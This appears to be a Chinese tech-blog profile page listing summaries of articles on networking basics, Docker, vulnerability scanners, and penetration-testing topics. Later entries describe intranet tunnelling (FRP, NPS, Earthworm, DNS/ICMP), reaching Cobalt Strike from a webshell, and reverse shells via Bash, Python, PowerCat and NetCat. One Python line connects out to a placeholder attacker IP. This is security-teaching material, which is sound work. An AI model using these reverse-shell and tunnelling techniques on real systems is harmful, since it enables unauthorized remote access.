- 博客(107)
- 收藏
- 关注
RSS订阅原创 容器管理工具 Docker生态架构及部署
用于安装Docker daemon的主机,即为Docker Host,并且该主机中可基于容器镜像运行容器。
2024-12-26 21:41:17
947
原创 容器技术所涉及Linux内核关键技术
很多编程语言都包含了命名空间的概念,我们可以认为命名空间是一种封装,封装本身实际上实现了代码的隔离在操作系统中命名空间命名空间提供的是系统资源的隔离,其中系统资源包括了:进程、网络、文件系统…实际上linux系统实现命名空间主要目的之一就是为了实现轻量级虚拟化服务,也就是我们说的容器,在同一个命名空间下的进程可以感知彼此的变化,而对其他命名空间的进程一无所知,这样就可以让容器中的进程产生一个错觉,仿佛它自己置身于一个独立的系统环境当中,以此达到独立和隔离的目的。
2024-12-24 21:03:26
753
原创 应用(APP)部署容器化演进之路
虚拟机采用虚拟化技术手段实现物理服务器计算资源打包的方式,为应用程序提供类物理服务器运行环境能够实现应用程序与应用程序之间的隔离使用自动化技术部署应用程序及应用程序迁移较方便可横向扩展容器容器是轻量级物理服务器计算资源的打包方式,即轻量级虚拟机,为应用程序提供类虚拟机运行环境。可在物理服务器中实现高密度部署容器与虚拟机对比对比属性容器(Container)虚拟机(VM)隔离性基于进程隔离提供资源的完全隔离启动时间毫秒级或秒级秒级或分钟级内核共用宿主机内核。
2024-12-24 19:22:29
1235
原创 操作系统权限介绍
windows提权一般是提权到administrator或者system权限linux提权就是将普通的用户提权到root用户passwd文件Linux 系统中的 /etc/passwd 文件,是系统用户配置文件,存储了系统中所有用户的基本信息,并且所有用户都可以对此文件执行读操作shadow文件密码保存在 /etc/shadow的文件中,这个文件只有root用户能够读取,其他用户都无法读取该文件。
2024-12-02 21:50:30
758
原创 GPON原理
对于OLT来说,它就相当于一个指挥官,它指挥PON口下的ONU在指定的时间段内发送数据以及发起测距过程等而ONU则是一个士兵,按照OLT的指挥做出相应而ODN它主要就是提供一个传输通道,主要包括分光器和光纤组成对于PON网络来说,它是一种点到多点结构的无源光网络,这个点到多点是指的是PON口的一个端口,通过分光器之后分成多束光,连接到多个ONU,这样的话就形成了一个点到多点的架构,并且分光器是一个无源分光器不需要接电,不需要维护。
2024-11-27 20:25:44
2120
原创 XG(S)-PON原理
XG(S)-PON实现单纤双向传输,系统采用WDM技术。为了分离同一根光纤上多个用户的信号,采用以下两种技术:下行数据流采用广播技术;上行数据流采用TDMA技术。
2024-11-26 22:30:43
2502
原创 Nessus 扫描web服务
13.输入用户名【xiaogang】,密码【123456】(需要扫描网站的用户名和密码)5.输入name【web扫描】,描述【web扫描】,目标【127.0.0.1】9.扫描类型选择【扫描所有web漏洞(快速)】17.选择【web扫描】,点击后边的【小三角】7.选择扫描类型【端口扫描(常用端口)】12.选择身份验证方法【自动认证】4.点击【Web应用程序测试】3.点击【New Scan】2.进入nessus网站。18.点击【web扫描】11.点击【HTTP】1.启动nessus。
2024-11-24 19:37:15
867
原创 nessus高级扫描
4.输入Name【高级扫描】,Description【高级扫描】,Targets【需要扫描的ip】19.点击【Credentials 】,选则【windows】,输入账户密码(必须输入)22.点击【高级扫描】,点击【More】,点击【Launch】10.点击【ASSESSMENT】,点击【general】2.进入nessus网站,点击【new Scan】7.点击【Discovery 】,点击【主机发现】5.点击【 Schedule】15.点击【Malware 】18.点击【ADVANCED】
2024-11-24 19:32:10
542
原创 Nessus Host Discovery
5.输入name【主机发现】,Description【主机发现】,Targets【192.168.3.0/24】,点击【Save】14.点击【More】,点击【Launch】这里是配置插件的地方,主机发现不要配置插件。8.点击【Discovery 】10.点击【Advanced 】6.点击【 Schedule】11.点击【Plugins】9.点击【Report 】15.点击【Launch】2.进入nessus网站。19.查看具体的扫描结果。13.点击【主机发现】16.点击【主机发现】1.启动nessus。
2024-11-24 19:31:23
218
原创 Nessus介绍与安装
Nessus号称是世界上最流行的漏洞扫描程序,全世界有超过75000个组织在使用它。该工具提供完整的电脑漏洞扫描服务,并随时更新其漏洞数据库。Nessus不同于传统的漏洞扫描软件,Nessus可同时在本机或远端上遥控,进行系统的漏洞分析扫描。Nessus也是渗透测试重要工具之一。
2024-11-24 18:38:09
845
原创 第五节-Goby+AWVS 联动
Goby是针对目标企业梳理最全面的工具,同构goby可以清晰的扫描出ip地址开放的端口,以及端口对应的服务,于此同事会根据开放的端口及应用进行实战化的测试,并不在乎他的中低危害漏洞,而更在乎的是它能直接getshell的漏洞。AWVS这款工具大家应该都比较熟悉了,他是针对web的轻量级的漏洞扫描工具。也就是根据我们提供的被扫描地址,快速的扫描出其所有的漏洞,包含高中低及信息泄露等漏洞。
2024-11-23 15:05:58
278
原创 第四节-扫描报告分析
Standard Reports:标准报告Affected Items:受影响项目Comprehensive (new):综合(新)Developer:开发者Executive Summary:执行摘要Quick:快速报告。
2024-11-23 14:56:53
196
原创 第三节-AWVS扫描Web应用程序
1.点击【Targets】,点击【add Target】2.输入扫描地址和扫描描述,点击【save】3.点击【Site Login】4.选择【try to auto-login into the site】,输入登录地址,用户名【xiaogang】,密码【123456】,重复密码【123456】5.点击【HTTP Authentication】的开启按钮6.输入用户名【小刚】,密码【123456】,重复密码【123456】7.点击【save】,然后点击【Scan】按钮。
2024-11-22 19:38:37
637
原创 第五节-AppScan自定义扫描策略,扫描针对性漏洞
安全扫描往往速度是很慢的,有些场景下他的扫描项目又不是我们需要的,这时候就需要定制专属的扫描策略了。本节课以sql注入漏洞为例。16.点击【手动扫描】,选择【AppScan Chromium 浏览器】5.选择【参数和cookie】,选择【定制头】,点击【+】5.切换到AppScan,填写定制头,点击【确定】17.选则要探索的页面,然后点击【确定】6.点击【测试策略】,选择【缺省值】20.点击【扫描】,选择【仅测试】1.选择【扫描web应用程序】9.展开全选该漏洞的pload。4.输入被目标网站url。
2024-11-22 18:37:30
351
原创 第三节-AppScan被动手动探索扫描
被动式扫描:浏览器代理到AppScan,然后进行手工操作,探索产生出的流量给AppScan进行扫描。他的优点是:扫描足够精准,覆盖率更加高,减少不必要的干扰包等等。
2024-11-22 15:38:09
350
原创 第一节-AppScan介绍和安装
Appscan 10中文版是是全新网络安全漏洞扫描软件,软件可以直接可以对OS命令、SSRF和XXE攻击等漏洞进行检测,使得漏洞检测更加容易,提高漏洞的扫描效率。软件同时支持动态、静态、互动分析三种不同的测试功能,可自动化扫描检测网络或者系统安全漏洞,并采用全新的爬虫技术,能够根据网站入口自动摸取网页链接进行安全扫描,提供了扫描、报告和修复建议等功能。
2024-11-20 19:50:05
323
原创 01 IP路由基础
协议计算出来的路由信息,我们称为动态路由(RIP、OSPF、ISIS、-------- 将数据包。1、直连路由:当接口的物理状态和协议状态都是 UP 的时候,路由。• 当数据包到达路由器之后,根据数据包的目的 IP 地址,查找。2、静态路由:根据访问需求,手工配置的路由,我们称为静态路由。2、路由优先级(优先级越小越优,如果外部优先级比不出来,则比。4、当路由的掩码长度一样长,同时优先级一样、开销值一样,此时。2、路由优先级要一样(路由优先级一样的前提是通过同一个协议学。
2024-11-19 20:58:50
960
原创 第九节 认识路由表/加表原则/查表原则
如果考虑到OSPF协议,两种优先级一样,那么就可以根据调整COST影响到路由的加表,就开始比较COST,COST越小越优。PC如果数据封装时,判断出是不同网段的数据,就会将地址转发给网关,让网关设备根据路由表进行地址的转发。路由的查表:当数据抵达路由器时,路由器根据已经存在的不同的表项,优选掩码最长的路由进行转发。1/直连路由:直连路由生成的两个条件,接口配置了IP地址之后,接口下的设备就为一个网段地址。3/123.1.1.1111 1100-30-----新盟教育在中国的天津市的北辰区。
2024-11-15 19:07:44
516
原创 第八节 如何结合AAA实现用户远程登录-路由基础
local-user zhangsan service-type telnet//定义用户登录方式。[AR1]dis rsa local-key-pair public //查看原有的密钥对。dis rsa peer-public-key brief //查看收到的公钥信息。user-interface vty 0 4//进入虚拟链路,可同时登录5个用户。[AR1]rsa local-key-pair create //设置密钥对。Stelnet X.X.X.X//STELNET登录,要在系统视图下登录。
2024-11-15 19:05:29
472
原创 第七节 认识网络设备-设备开局设置
Huawei]sysname TJ-HP-SJZX-1-1//名字设置-天津-和平-数据中心-1号柜-1号设备。接口视图:[Huawei-GigabitEthernet0/0/1]:配置接口参数时使用。ACT:插U盘的-PE,设备空系统时,可以借助U盘,进行系统升级或者安装。1、<Huawei>system-view //从用户视图进入系统视图。黄色:UP-LINK=上联-连接更多的交换机或者路由器-1G-10G。协议视图:[Huawei-ospf-1]配置改协议下的命令时使用。
2024-11-15 19:03:44
660
原创 第六节 OSI-ARP-传输层TCP/UDP
如果SYN的值是1时,这个字段的值就是初始序列值(ISN),用于对序列号进行同步。当 SYN=1,ACK=1 时,表示对方同意建立连接。TCP 首部长度(Header Length):数据偏移是指数据段中的“数据”部分起始处距离 TCP 数据段起始处的字节偏移量,占 4 位。其实这里的“数据偏移”也是在确定 TCP 数据段头部分的长度,告诉接收端的应用程序,数据从何处开始。UDP=用户数据包协议,面向无连接的协议--不可靠的传输---实时性的业务---可以满足实时性业务通信需求,对时间要求更高的流量。
2024-11-15 19:01:07
529
原创 第五节-OSI-IP地址分类/子网掩码
192.168.0.1---病毒---192.168.1.1---安全软件同时问世。公式:求主机数量=2的主机位次方----主机位越多,代表一个网络内的地址数量越多。1.0.0.0---126.255.255.255:A类可用的地址范围。可用范围:192.168.1.129---192.168.1.254。C类:192.168.0.0----192.168.255.255。B类:172.16.0.0----172.31.255.255。A类:10.0.0.0----10.255.255.255。
2024-11-14 19:32:41
627
原创 第四节-OSI-网络层
TTL发出数据时携带TTL值255,每经过一台设备TTL递减1,减到TTL=1时判断为,网络不可达,无法正常通信。192.168.56.1===十进制===32bit=4B,用点进行分割8bit=1B,分割成4段。2、time to live=生存时间=TTL:网络层三层环境中,用来防环的,IP自带。Flags=标志:接收到为0的分片数据时,判断接收完毕,准备开始重组。ID=标识:分片时,所有的分片该数值都相同,就标识为同一组数据。组播MAC:第8bit为1的,虚拟产生,一对多进行组播通信。
2024-11-14 19:23:17
810
原创 第三节 OSI-数据链路层
3、(1)首先检查目的MAC是否为自身,如果不是则丢弃,如果是则查看自身是否加入到组播组中,如果没加入丢弃,如果加入了进行下一步。物理地址. . . . . . . . . . . . . : 02-00-4C-4F-4F-50。物理地址. . . . . . . . . . . . . : 02-00-4C-4F-4F-50。(2)将数据同样进行一次CRC校验,然后比对自身FCS字段,如果不同则丢弃,如果相同则进一步处理;MAC:即存在物理网卡上=物理地址---烧录在网卡上---不可替换--全球唯一。
2024-11-12 22:56:51
588
原创 第二节 OSI-物理层
-----------------------------------------------------开发。单模光纤---玻璃丝-细===损耗小--距离远===开销高---适用于数据中心。多模光纤---玻璃丝-粗===损耗大--距离近===开销低---适用于企业网。维护一个逻辑的链路---添加发送人信息---定义传输数据的大小。9、七类:用于万兆网络---都是屏蔽双绞线---10G。6、超五类:增加了屏蔽层---250M--1000M。1、一类:早期的电话线缆--2芯--56Kb。
2024-11-12 22:53:30
389
原创 第一节 网络是什么?网络历史沿革
华为---通信--运营商---技术研发---企业扩展---手机消费者市场---网络运营商的路由器---思科---VRP---企业网交换机---收购--3COM---H3C交换机---HP服务器---国企清华紫光--新华三。双绞线链接--网线RJ45--8芯铜线---1236---高低电频--高1低0---信号衰减---100M---传输距离有限。TCP/IP--协议栈----众多的协议组成---网络设备遵守----正常通信。园区组建----医疗---军队---政府--企业---银行---金融。
2024-11-12 22:51:28
447
原创 DNS和ICMP隧道
域名系统(Domain Name System,缩写:DNS)是互联网的一项服务。它作为将域名和IP地址相互映 射的一个分布式数据库,能够使人更方便地访问互联网。DNS使用TCP和UDP端口53。当前,对于每一 级域名长度的限制是63个字符,域名总长度则不能超过253个字符。DNS协议是用来将域名转换为IP地 址,DNS除了提供主机名到IP地址转换外,还提供如下服务:主机别名、邮件服务器别名、负载分配等。
2024-11-05 16:30:32
796
原创 上线不出网机器
如果说当我们拿到一台电脑(一般是WEB机器)但是不出网。只有http端口可以连接,只有webshell的情况下,我们该如何上线到CS呢?这个时候就要借助80端口,然后开启socks隧道,从而进行上线。
2024-11-05 14:09:52
970
原创 FRP NPS介绍和使用
配置文件非常重要,需要什么功能就可以进行不同的配置,来进行代理 参考文档:https://gofrp.org/docs/reference/server-configures/服务端:基础配置nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发,可支持任 何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析等 等……),此外还支持内网http代理、内网socks5代理、p2p等,并带有功能强大的web管理端。
2024-11-05 13:52:00
994
原创 Earthworm使用
Earthworm简称EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功 能,可在复杂网络环境下完成网络穿透该工具已经停止维护和下载:http://rootkiter.com/EarthWorm/该工具支持端口转发,正向代理,反向代理,多级代理等方式,可以打通一条网络隧道,直达网络深 处,用蚯蚓独有的手段突破网络限制接下来我们学习一下下载地址;
2024-11-05 13:28:11
987
原创 应用层内网代理
内网资产扫描这种场景一般是进行内网渗透才需要的代理技术,如果你不打内网一般是不需要这种技术 的,内网代理技术一般也是采用http或者socks代理针对以上的情况我们需要如何对内网进行扫描呢?1、直接使用web服务进行扫描(这种方式请看内网渗透)2、做代理让web服务成为代理机器针对于内网的机器要考虑是用代理隧道还是使用端口转发在这种情况需要用什么工具走代理呢?1、扫描工具2、浏览器3、burp使用代理一般是用http代理或者socks代理代理后的拓扑如下。
2024-11-05 12:31:02
248
原创 应用层代理技术
应用层代理是我们最常用的代理,平时在进行内网渗透,或者扫描的时候经常需要这个代理,根据协议 不同大体有以下的分类1、http代理2、socks代理3、SSH代理4、DNS代理5、还有自定义的一些协议和加密规则(强烈谴责,正经人谁用这些,都是目的不纯)这个技术我们不讨论每种代理应用的场景不同,在不同的场景需要选择不同的代理,接下来我们看一下需要代理的场景平时在做渗透测试中我们需要对公网的资产进行扫描和探测,但是又害怕对方封掉你的IP地址,我们需要挂代理在这种情况我我们需要哪些东西走代理呢?
2024-11-04 20:42:27
943
原创 Bash反弹shell
机器名称机器IP攻击机器实验靶机Python由荷兰数学和计算机科学研究学会的吉多·范罗苏姆于1990年代初设计,作为一门叫做ABC语 言的替代品。Python提供了高效的高级数据结构,还能简单有效地面向对象编程。Python语法和动 态类型,以及解释型语言的本质,使它成为多数平台上写脚本和快速开发应用的编程语言,随着版本 的不断更新和语言新功能的添加,逐渐被用于独立的、大型项目的开发。python反弹shell介绍python2s.connect(("攻击机器IP",端口));机器名称。
2024-11-04 19:30:42
1109
原创 PowerCat反弹Shell
PowerCat是一个powershell写的tcp/ip瑞士军刀,可以看成ncat的powershell的实现,然后里面也 加入了众多好用的功能,如文件上传,smb协议支持,中继模式,生成payload,端口扫描等等。
2024-11-04 17:56:06
729
原创 NetCat反弹shell
Netcat简称NC,是一个简单、可靠的网络工具,被誉为网络界的瑞士军刀。通过NC可以进行端口扫描、 反弹Shell、端口监听和文件传输等操作
2024-11-04 16:19:09
592
原创 Linux操作系统基础知识
有四个重要的组成部分,分别是内核、shell、文件系统、应用程序组成前面的内核、shell、文件系统组成了最基本的系统结构,在这个结构的基础上面,我们就可以去运行程序,可以去使用管理控制操作系统,管理文件等等应用程序指得就是我们安装的各种各样的软件,比如浏览器,输入法等等内核:1、管理进程2、管理内存3、管理驱动4、管理文件和网络。
2024-11-02 20:32:23
990
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人